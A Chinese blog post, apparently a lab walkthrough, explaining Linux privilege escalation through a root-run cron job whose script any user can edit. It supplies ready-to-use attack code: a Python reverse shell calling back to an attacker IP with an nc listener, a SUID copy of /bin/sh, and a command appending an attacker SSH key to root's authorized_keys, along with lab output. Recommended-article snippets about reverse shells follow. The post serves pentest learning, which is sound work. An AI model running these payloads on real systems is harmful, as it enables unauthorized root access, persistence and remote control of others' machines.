利用定时任务提权

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量310 收藏
点赞数
分类专栏: 提权 没用的小寄巧 文章标签: linux 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65267037/article/details/130308328
版权

目录

前提

有以 root 权限执行的定时任务,且该任务执行的脚本是当前 shell 用户可以修改的。

利用定时任务提权

​ 我们在拿到shell之后,如果没有现成的内核提权exp可供使用的话,可以从他们的定时任务入手,看看有没有定时任务调用的脚本文件是我们的shell用户可以修改的,同时又是以 root 用户执行的,然后就可以修改之后静待反弹了

方法1 利用定时任务中使用的有修改权限的文件反弹 root shell

首先,我们需要先看有没有定时任务,然后,我们需要找到当前 shell 对哪些文件拥有 修改 的权限,这个文件还需要被定时任务执行,可以使用以下命令

cat /var/log/cronlog			# 查看是否执行了定时任务,crontab -l 需要 root 权限使用,所以我们只能看日志了
*/2 * * * * cleaner.py
find / -perm -o+w -type f 2> /dev/null | grep /proc -v 
# 这句命令的意思是,找出除 /proc 文件下的所有有 写 和 执行 权限的文件
# find -perm 按照文件权限匹配文件,-o+w 表示包括具有 写权限 的文件,同时属于所有用户的
# find -type f  查找类型是文件的文件
# 2> /dev/null 丢掉报错
# grep /proc -v  -v 表示反向查找,就是不包含 /proc 目录下的
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/19.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py

可以看到满足 可修改 的文件有 cleaner.py,这个文件被定时任务执行,只需要修改它的内容去反弹shell,我们就只要打开监听,等着它被执行就好了

下面开始利用

ssh> nano /lib/log/cleaner.py
# 然后将以下代码替换之前的代码,在攻击机打开 nc 开始监听,等待反弹即可
#!/usr/bin/python
def con():
	import socket, time,pty, os
	host='192.168.56.148'
	port=6666
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)	# 创建一个使用tcp协议套接字的网络连接
	s.settimeout(10)			# 设置超时时间 10s
	s.connect((host,port))			# 使用tcp连接 目标主机
	# os.dup2() 方法用于将一个文件描述符 fd 复制到另一个 fd2
	# 使用fileObject.fileno()返回一个整型的文件描述符,并使用os.dup2(s.fileno(),0)把这个整型的文件描述符复制到后面的0
	# 三个dup2函数先后将socket重定向到标准输入,标准输入,标准错误输出。
	os.dup2(s.fileno(),0)		# 这里的 0,1,2 代表 标准输入 输出 错误输出
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	os.putenv("HISTFILE",'/dev/null') # 设置环境变量。Histfile 是变量名,/dev/null 是变量值
	pty.spawn("/bin/bash")		# 获取交互式shell
	s.close()					# 关闭连接
con()

kali> nc -nvlp 6666

方法2 利用定时任务创建sh提权,将 当前用户提到 root 群组

利用条件同提权2 ,只是修改成以下代码

#!/usr/bin/env python
import os
import sys
try:
       os.system('cp /bin/sh /tmp/test')
       os.system('chmod u+s /tmp/test')		# chmod u+s 就是给某个程序的所有者以suid权限,可以像root用户一样操作
except:
        sys.exit()

等待定时任务执行后,只需要执行 ./tmp/test 即可提权完成

但这种情况下的 root 权限只是暂时的,在此时反弹的 shell 也是原用户的shell,而不是 root shell。

方法3 写入ssh rsa ,使用ssh免密登录root用户

这里我们先介绍一下通过免密登录ssh的两种方法:(A登录B服务器)

  1. 在B服务器上,把A的公钥pub文件,放到B的 /root/.ssh/authorized_key 文件中。

authorized_keys文件里保存了其他人的公钥列表,代表这些服务器可以直接登录自己。
通过ssh 就可以直接登录 ssh root@B的ip

令执行过程:A会用自己的.ssh/目录下的私钥文件,例如 id_rds进行加密登录。而B会用自己authorized_keys保存的公钥内容进行解密,如果解密成功。就认为A是合法用户,让A免密登录。注:所以A的目录下必须有id_rsa文件。

  1. 下载B的私钥文件,生成pem文件

    新建一个pem文件,把B的private内容粘贴进去

    利用ssh命令即可登录

    ssh -i b的私钥.pem文件 root@B的ip地址

    B的私钥文件(原本只能B自己知道)给了A,证明B足够信任A,A可以直接登录B

命令执行过程:A会用-i指定的私钥文件(这里就是B的私钥文件)加密,B在自己的authorized_keys中用自己的公钥文件解密。如果成功,就认为A是合法用户,让A免密登录。

这里我们利用的就是方式一,通过定时任务的文件,将自己的 公钥放入靶机的 authorized_keys 文件,实现攻击机的免密登录

kali> ssh-keygen   
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):  # 输入key的保存路径,这里不是指定 回车 即可,默认路径 /root/.ssh/id_rsa
Enter passphrase (empty for no passphrase): 	# 输入口令,直接回车就是空口令
Enter same passphrase again: 			# 再次输入口令,直接回车就行了
Your identification has been saved in  
Your public key has been saved in  .pub
The key fingerprint is:
SHA256:e+x2FkCYSZ+q1NzKHYay27gwjYchsmIrlZw5yNCjcso root@kali-attack
The key's randomart image is:
+---[RSA 3072]----+
|       ..+       |
|        +...     |
| .       .o      |
|. o    o +.      |
|++.=. o S +.     |
|++O. * = * ..    |
|== .= = + +  .   |
|=E.  + + o. o    |
|..    +....o     |
+----[SHA256]-----+      
kali> cat /root/.ssh/id_rsa_pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDF019H+gCL1wZgmScqpqBbjgR0qKQ7mtXTtUqPuj5hJ0mhVoq4IUQCxwcKythVIxGPBoaF4J/I6AVHZkYUKliaeXbJqsVYym3sO5DZtkK726DfpQDzikcuFe3f/HBHXUp8CFDN4XqznDypeXfrmff3yBwsjyyr6kbtmBScYIJwW7ThA2NffS7gJzV640QQJpQqTH2r6b8ubDA3OKeKlMdquub7nQ9q6/VLmPudN+Fp2JmBMWUxlGmwxJwVEn9NCxQKHrp66/1ikk/tIeZ1VUz76d+uIeZmN1jPCXNO3X5JU/wM23JsBCMhivlgEcW3G4uyS3qVHruJJeEmbs= root@kali-attack

要利用的话只需要在靶机上创建一个 /root/.ssh/ 文件夹,并创建一个 authorized_keys,再将上面的公钥写入其中,等待定时任务执行后通过攻击机直接登录即可,此时登录就是 root 权限

shell> nano /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
       os.system('mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDF019H+gCL1wZgmScqpqBbjgR0qKQ7mtXTtUqPuj5hJ0mhVoq4IUQCxwcKythVIxGPBoaF4J/I6AVHZkYUKliaeXbJqsVYym3sO5DZtkK726DfpQDzikcuFe3f/HBHXUp8CFDN4XqznR4+UiBxWYxv2P58usO1IY6u3xLMIrMUO87GtiBfU9A3OKeKlMdquub7nQ9q6/VLmPudN+Fp2JmBMWUxlGmwxJwVEn9NCxQKHrp66/1ikk/tIeZ1VUz76d+uIeZmN1jPCXNO3X5JU/wM23JsBCMhivlgEcW3G4uyS3qVHruJJeEmbs= root@kali-attack" >> /root/.ssh/authorized_keys')
except:
        sys.exit()
        
kali> ssh root@192.168.56.151  # 即可
Last failed login: Sat Apr 22 18:23:58 CST 2023 from 192.168.56.151 on ssh:notty
There were 2 failed login attempts since the last successful login.
Last login: Sat Apr 22 17:33:41 2023 from 192.168.56.151
root@192.168.56.151:/#
水南山
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux创建定时任务限,利用定时任务(Cronjobs)进行Linux
weixin_30338049的博客
04-30 1261
本文讲解如何利用Linux的Cron Jobs(定时任务)来进行升。cron jobs定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /e...
Linux 定时任务
大河之犬的博客
06-19 1799
定时任务(cron job)是Linux系统中的一个守护进程,用于调度重复任务,通过配置crontab可以让系统周期性地执行某些命令或者脚本。cron 是 Linux 系统中最为实用的工具之一,但是也可能被黑客用于操作。由于cron通常以root特运行,如果我们可以修改其调度的任何脚本或二进制文件,那么便可以使用root限执行任意代码。
反弹shell 看这一篇就够了
最新发布
m0_69043895的博客
04-21 1395
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
上传“定时任务“获取系统
SecINAdmin的博客
11-25 229
上传"定时任务"获取系统限 原文来自SecIN社区—作者:tkswifty 相关背景   文件上传是系统中比较常见的业务需求,例如上传头像、简历、报表等。但是如果在业务实现过程中没有考虑相关的安全问题(例如没有对用户上传的文件类型做校验或者校验不充分,导致用户可以上传恶意脚本到服务器)便会导致相关的风险。   Java文件类File以抽象的方式代表文件名和目录路径名。该类主要用于文件和目录的创建、文件的查找和文件的删除等。   一般新建文件是通过将给定路径名字符串转换成抽象路径名来创建一个新File实例:
Linux
niqiu320的博客
05-24 902
Linux大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在的萌芽里面。Linux系统的过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
升-Linux定时任务&环境变量&数据库
xhscxj的博客
03-07 311
一、Linux 本地环境变量安全-Aliyun(鸡肋) 配合 SUID 进行环境变量-本地用户环境 手写调用文件-编译-复制文件-增加环境变量-执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id 当执行shell命令的时候,默认去调用环境变量ps,而环境变量ps已经被我们覆盖了,就会去执行覆盖后的ps,从而执行sh demo.c内容 ...
furion内置的定时任务使用学习,动态添加定时任务代码
10-24
furion内置的定时任务使用学习,动态添加定时任务代码
在ubuntu服务器上设置定时任务
12-22
在ubuntu服务器上设置定时任务 可以使用crontab,这个工具还是非常简单的 * * * * * command 这就是crontab命令的格式,在cmd输入 crontab -e 就可以进入编辑的界面。 上面的格式对应着分钟、小时、月里面的天(1-...
Android实现定时任务及闹钟
01-03
android中定时有很多种是实现,常见的Handler 与Thread的结合,handler.postDelayed ,以及要使用的AlarmManger 等都可以实现定时任务的执行,但是使用场景却大不相同,这里主要是怎么用AlarmManager实现定时任务。...
go 实现定时任务 删除 任务等等
01-07
go 实现定时任务 Installation To download the specific tagged release, run: go get github.com/robfig/cron/v3@v3.0.0 Import it in your program as: import github.com/robfig/cron/v3 It requires Go 1.11 ...
详解linux下利用crontab创建定时任务
09-15
在Linux操作系统中,`crontab` 是一个强大的工具,用于...感谢你阅读这篇关于利用 `crontab` 在 Linux 下创建定时任务的文章,希望对你有所帮助。如有疑问,欢迎问,我们将尽力为你解答。感谢你对我们的网站的支持!
LINUX之计划任务
小王的储物间
12-14 816
总结一下本文的知识点,讲了计划任务常用的两种方法以及漏洞探针的安装及使用,有兴趣的小伙伴可以自己尝试去搭建靶机,如果喜欢本文不妨一键三连。
升】Linux系统&环境变量&定时任务&限配置不当&MDUT自动化
今天是几号的博客
03-03 812
Linux-环境变量文件配合SUID-本地 Linux-定时任务打包配合SUID-本地 Linux-定时任务文件限配置不当-WEB&本地 Linux-第三方软件MYSQL数据库-WEB&本地 利用phpmailer漏洞进行修改并反弹 1、无法外联走隧道-MDUT自动化数据库 2、利用Mysql searchsploit-手工
linux定时计划反弹shell
niqiu320的博客
05-26 2151
crontab crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 858
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
操作系统限维持(六)之Linux系统-定时任务后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 624
使用crontab命令进行反弹shell。crontab命令用于设置周期性被执行的指令。新建shell脚本,利用脚本进行反弹。我们可以使用crontab -e或者vim /etc/crontab添加计划任务。kali机器收到反弹shell。设置定时任务为每分钟执行一次。kali机器开启监听。
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2306
常用反弹shell技术汇总
网络安全——redis未授访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5582
redis的未授访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
CVE-2010-2816 复现+反弹shell
weixin_45695535的博客
05-03 1696
整体过程漏洞描述一、复现过程环境复现1.解密2.根据js找到加密逻辑反弹shell1.一句话木马方式2.计划任务反弹shell参考文章 漏洞描述 Adobe ColdFusion 是美国 Adobe 公司的一款动态 Web 服务器产品,其运行的 CFML(ColdFusion Markup Language)是针对 Web 应用的一种程序设计语言。 Adobe ColdFusion 8、9 版本中存在一处目录穿越漏洞,可导致未授的用户读取服务器任意文件。 一、复现过程 环境 一台攻击机(kali-20
linux定时任务
05-25
Linux定时任务通常使用crontab命令进行配置,而对于需要任务,可以使用sudo命令进行。以下是一些步骤: 1. 打开终端,输入sudo crontab -e命令来编辑root用户的定时任务。 2. 添加需要执行的命令,例如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值